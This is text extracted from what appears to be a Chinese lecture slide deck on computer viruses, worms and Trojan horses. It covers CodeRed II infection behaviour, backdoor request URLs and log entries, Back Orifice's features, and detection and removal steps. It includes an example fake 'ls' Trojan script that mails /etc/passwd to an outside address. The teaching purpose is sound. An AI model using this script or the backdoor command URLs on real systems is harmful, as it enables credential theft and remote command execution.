计算机病毒蠕虫和特洛伊木马介绍.pptVIP

CodeRed II 增加了特洛依木马的功能，并针对中国网站做了改进 计算IP的方法进行了修改，使病毒传染的更快； 检查是否存在CodeRedII原子，若存在则进入睡眠状态防止反复感染，若不存在则创建CodeRedII原子； 创建300个线程进行传染，若系统默认语言为简体中文或繁体中文，则创建600个线程； 检查时间。病毒作者的意图是传播过程在2001年10月1日完成，之后，蠕虫会爆发而使系统不断重新启动。 在系统中安装一个特洛依木马： 拷贝系统目录cmd.exe到IIS的脚本执行目录下，改名为root.exe； 将病毒体内的木马解压缩写到C盘和D盘的explorer.exe 木马每次系统和启动都会运行，禁止系统的文件保护功能，并将C盘和D盘通过web服务器共享 CodeRed II 攻击形式 http://x.x.x.x/c/inetpub/scripts/root.exe?/c+dir http://x.x.x.x/c/winnt/system32/cmd.exe?/c+dir 其中x.x.x.x是被攻击的IP地址，dir可以是任意命令，比如删除系统中的文件，向外发送机密数据等，这个后门后来也成为了nimda病毒的一个传播模式。 下面是cert/cc上提供的被攻击服务器日志(CA-2001-11) 2001-05-06 12:20:19 0 - 0 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 – 2001-05-06 12:20:19 0 - 0 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 – 红色代码病毒的检测和防范 针对安装IIS的windows系统； 是否出现负载显著增加（CPU/网络）的现象； 用netstat –an检查是否有许多对外的80端口连接 在web日志中检查是否有/default.ida?xxx..%u0078%u0000 ％u00=a HTTP/1.0这样的攻击记录； 查找系统中是否存在文件c:\explorer.exe或d:\explorer.exe 以及root.exe； 检查注册表文件中是否增加了C和D虚拟目录，以及文件保护功能是否被禁止。 在任务管理器中检查是否存在两个explorer.exe进程。 提纲 计算机病毒 网络蠕虫 特洛伊木马 特洛伊木马 名字来源：古希腊故事 通过伪装成其他程序、有意隐藏自己恶意行为的程序，通常留下一个远程控制的后门 没有自我复制的功能 非自主传播 用户主动发送给其他人 放到网站上由用户下载 最简单的木马举例 ls #!/bin/sh /bin/mail myaddress@ /etc/passwd ls PATH=./ :/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin 特洛依木马举例 Back Orifice Cult of the Dead Cow在1998年8月发布, 公开源码软件，遵守GPL，是功能强大的远程控制器木马。 boserver.exe、boconfig.exe、bogui.exe 在BO服务器上启动、停止基于文本的应用程序 目录和文件操作。包括创建、删除、查看目录、查找、解压、压缩。 共享。创建共享资源 HTTP服务。启动或停止HTTP服务。 击键记录。将BO服务器上用户的击键记录在一个文本文件中，同时记录执行输入的窗口名。（可以获得用户口令） 特洛依木马 视频输入、播放。捕捉服务器屏幕到一个位图文件中。 网络连接。列出和断开BO服务器上接入和接出的连接，可以发起新连接。 查看信息。查看所有网络端口、域名、服务器和可见的共享“出口”。返回系统信息，包括机器名、当前用户、CPU类型、内存容量及可用内存、Windows版本、驱动器类型、硬盘容量及使用空间。 端口重定向。 注册表 锁住或重启计算机。 传输文件 特洛依木马 使用netstat –a 检查是否还有未知端口监听(默认31337) 检测和删除 注册表HLM\software\microsoft\windows\currentVersion\runservices键值，是否有“Name Data.exe”，若有则删除 C:\windows\system目录： 删除“ .exe”文件和windll.dll文件 特洛依木马 其他木马 国外 subsever、dagger 、ACKcmdC、DeepThroat、SatansBackdoor 等 国内（更常见） 冰河、广外女生、netspy、黑洞等 删除木马的通用方法 Win.ini文件